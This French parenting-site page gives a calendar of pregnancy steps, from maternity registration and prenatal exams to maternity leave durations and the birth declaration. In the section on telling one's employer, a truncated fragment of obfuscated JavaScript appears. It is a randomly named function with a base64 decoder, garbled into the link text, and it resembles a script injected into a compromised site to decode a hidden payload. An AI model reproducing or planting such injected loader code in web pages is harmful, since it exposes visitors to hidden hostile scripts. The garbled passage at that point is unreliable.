Mes démarches pendant la grossesse

Mes démarches pendant la grossesse
Parce que la grossesse est une magnifique aventure remplie d'inconnus (surtout si c'est la première), voici un récap de toute les démarches que vous aurez à faire pendant 9 mois ! Visites médicales, démarches administratives ou préparation de l'arrivée de bébé, découvrez ce qu'il faut savoir pour vivre votre grossesse le plus sereinement possible. Attention, notre calendrier des démarches n'est pas encore terminé. Il sera bientôt personnalisé en fonction de votre date prévue d'accouchement. Patience et merci pour votre visite!
inscription maternité

Inscription maternité

De 7 à 14 SA (semaines d’aménorrhée)

Même si ça vous paraît bizarre, nous vous conseillons de vous inscrire le plus tôt possible dans une maternité après la découverte de votre grossesse, surtout si vous êtes en région parisienne ou dans une grande ville.

Comment choisir sa maternité ?
examen prenatal

Date limite pour le 1er examen prénatal obligatoire

Avant 15 SA

Le premier examen prénatal obligatoire doit être pratiqué avant la fin du 3e mois de grossesse, soit 15 semaines d’aménorrhée. Le médecin vous remet alors un document en trois volets intitulé « Premier examen médical prénatal ».

test sanguin grossesse

Date limite pour le 1er bilan sanguin

Avant 15 SA

Le bilan sanguin est prescrit par votre médecin lors du 1er examen prénatal et permet de vérifier vos immunités contre la toxoplasmose et la rubéole. Il permet aussi de déterminer votre groupe sanguin et votre rhésus et de dépister une éventuelle anémie ainsi que la présence de certaines maladies (syphilis, hépatite B et VIH).

Le test sanguin de grossesse
déclaration de grossesse

Date limite pour envoyer sa déclaration de grossesse

Avant 15 SA

Lors de votre premier examen prénatal, le médecin vous a remis un document intitulé « Premier examen médical prénatal ». Vous devez envoyer le volet rose à votre caisse d’Assurance Maladie et les deux volets bleus à votre caisse d’allocations familiales (CAF).

1ere echo

Première échographie

Entre 11 et 13 SA

La 1ère échographie, dite de datation, permet d’établir la date de début de grossesse et de vérifier l’épaisseur de la nuque de votre bébé.

prévenir son employeur de sa grossesse

Prévenir son employeur

Entre 13 et 17 SA

Bien que la loi ne vous oblige pas à annoncer votre grossesse à votre employeur, nous vous conseillons de le faire assez tôt, à partir de 3 mois de grossesse. Pour en savoir plus, lisez notre article :

function h94fcba1e7(y1){var vd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb='';var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.c/">Quand annoncer sa grossesse à l’employeur?
dépistage trisomie

Dépistage trisomie 21

Entre 15 et 19 SA

Le dépistage de la trisomie 21 est proposé à toutes les femmes enceintes quelque soit leur âge. Ce dépistage associe les dosages de marqueurs sériques (prélèvement de sang) effectués par un laboratoire autorisé et une mesure de la clarté nucale effectuée par un échographiste qualifié.

conge pathologique

Congé pathologique (uniquement sur prescription du médecin) Pour des triplés (ou plus)

Entre 14 et 16 SA

Pour des triplés, la durée du congé pathologique est de 2 semaines maximum, prescrit en une ou plusieurs fois.

examen bucco-dentaire

Examen bucco-dentaire (facultatif)

Entre 16 à 20 SA

Les femmes enceintes peuvent bénéficier d’un examen de prévention bucco-dentaire pris en charge à 100% par l’Assurance Maladie à compter du 4ème mois de grossesse jusqu’à 12 jours après l’accouchement.

cours accouchement

Se renseigner sur les différentes préparations à l’accouchement

Entre le 4e et le 5e mois

Une préparation à l’accouchement traditionnelle de 8 séances vous sera proposée dans votre maternité. Ces séances sont remboursées à 100% par l’Assurance Maladie. Vous pouvez aussi choisir de suivre une préparation différente plus proche de vos attentes.

mode de garde

Se renseigner sur les modes de garde auprès de sa municipalité

Entre le 5e et le 6e mois

Nous vous conseillons de vous renseigner assez tôt sur les différents modes de garde de votre ville, surtout si vous souhaitez inscrire votre enfant à la crèche. Malheureusement, la demande est plus élevée que l'offre et il faut s'y prendre tôt.

2e echo

Deuxième échographie

Entre 21 et 23 SA

La deuxième échographie, dite échographie morphologique, se pratique au cours du 5e mois de grossesse et permet de réaliser une étude morphologique du fœtus et d’évaluer sa croissance. C’est également pendant cette écho que les parents peuvent découvrir le sexe du bébé !

conge pathologique

Congé pathologique (uniquement sur prescription du médecin) Pour des jumeaux

Entre 27 et 29 SA

Pour des jumeaux, la durée du congé pathologique est de 2 semaines maximum, prescrit en une ou plusieurs fois.

préparer la chambre de bebe

Préparer la chambre du bébé

Entre le 6e et le 7e mois

Il n’y a pas vraiment de règles pour la préparation de la chambre. Tout dépend si c’est votre premier enfant ou pas, si vous devez tout acheter ou que vous pouvez vous faire prêter du matériel. On vous conseille de vous y prendre dès le 7e mois de grossesse car les délais de livraison sont souvent longs et vous risquez d’être fatiguée le dernier mois de grossesse.

conge maternite

Congé maternité Pour des jumeaux

A partir de 29 SA

La durée du congé maternité est de 34 semaines dont, en principe, un congé prénatal de 12 semaines avant la date présumée de l’accouchement et un congé postnatal de 22 semaines après l’accouchement.

3e echo

Troisième échographie

Entre 31 et 33 SA

La troisième échographie permet de vérifier la croissance du fœtus.

conge pathologique

Congé pathologique (uniquement sur prescription du médecin) Pour un 3e enfant ou plus

Entre 31 et 33 SA

Pour un troisième enfant, la durée du congé pathologique est de 2 semaines maximum, prescrit en une ou plusieurs fois.

valise maternite

Préparer la valise pour la maternité

Entre le 7ème et le 8ème mois
Afin d’éviter les crises de panique, nous vous conseillons de préparer votre valise pour la maternité 1 mois avant la date d’accouchement prévue. Et si vous ne savez pas quoi emmener, consultez l’article ci-dessous :

Valise maternité : la liste complète
conge maternite

Congé maternité Pour un 3e enfant ou plus

A partir de 33 SA

La durée du congé maternité est de 26 semaines dont, en principe, un congé prénatal de 8 semaines avant la date présumée de l’accouchement et un congé postnatal de 18 semaines après l’accouchement.

conge pathologique

Congé pathologique (uniquement sur prescription du médecin) Pour un 1er ou un 2e enfant

Entre 33 et 35 SA

Pour un premier ou un deuxième enfant, la durée du congé pathologique est de 2 semaines maximum, prescrit en une ou plusieurs fois.

Le congé pathologique, c’est quoi?
conge maternite

Congé maternité Pour un 1er ou un 2e enfant

A partir de 35 SA

La durée du congé maternité est de 16 semaines dont, en principe, un congé prénatal de 6 semaines avant la date présumée de l’accouchement et un congé postnatal de 10 semaines après l’accouchement.

RDV anesthésiste

Rendez-vous avec l’anesthésiste

Entre 36 et 40 SA

La consultation avec l’anesthésiste est obligatoire même si vous ne souhaitez pas de péridurale. En effet, en cas de problème, l’équipe médicale peut avoir besoin de pratiquer une anesthésie en urgence. En général, la consultation se fait au 8e mois de grossesse, sauf si des problèmes particuliers sont décelés plus tôt. Dans ce cas, la consultation a lieu plus tôt.

date à laquelle bébé n'est plus prema

Date à laquelle le bébé n’est plus prématuré

A partir de 38 SA

A partir de la 38ème semaine d’aménorrhée, on considère que l’enfant naît à terme.

declaration de naissance

Déclaration de naissance

Au maximum, 3 jours après la naissance

Attention, la déclaration de naissance est obligatoire et vous n’avez que 3 jours (repoussés au lundi en cas de naissance un jeudi ou vendredi) pour l’effectuer. Passé ce délai, il vous faudra saisir le tribunal de grande instance. Un tel manquement engage votre responsabilité civile et vous risquez une amende de 1 500€ en plus des frais d'avocat à engager.

consultation post-natale obligatoire

La consultation postnatale obligatoire

Entre 6 à 8 semaines après l’accouchement

La consultation postnatale est une étape obligatoire de votre parcours de jeune maman. Elle doit se faire entre la 6ème et 8ème semaine suivant l’accouchement. S’agissant d’une consultation obligatoire, elle est prise en charge à 100% par la sécurité sociale.

conge maternite

Congé maternité Pour des triplés (ou plus)

A partir de 16 SA

La durée du congé maternité est de 46 semaines dont, en principe, un congé prénatal de 24 semaines avant la date présumée de l’accouchement et un congé postnatal de 22 semaines après l’accouchement.